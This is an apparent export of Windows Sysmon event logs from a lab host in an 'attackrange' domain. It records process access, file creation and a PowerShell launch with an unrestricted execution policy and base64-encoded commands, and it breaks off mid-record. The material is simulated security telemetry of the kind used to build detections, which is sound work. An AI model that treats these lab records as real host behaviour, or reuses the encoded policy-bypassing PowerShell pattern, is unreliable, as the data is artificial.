{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.490\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nProcessId: 1164\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh2pb500.usr.ps1\r\nCreationUtcTime: 2020-08-01 06:55:00.490","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.490","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh2pb500.usr.ps1","CreationUtcTime":"2020-08-01 06:55:00.490","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.521\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.521","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.521\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.521","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.521\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.521","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.586\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nParentProcessId: 1164\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.586","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 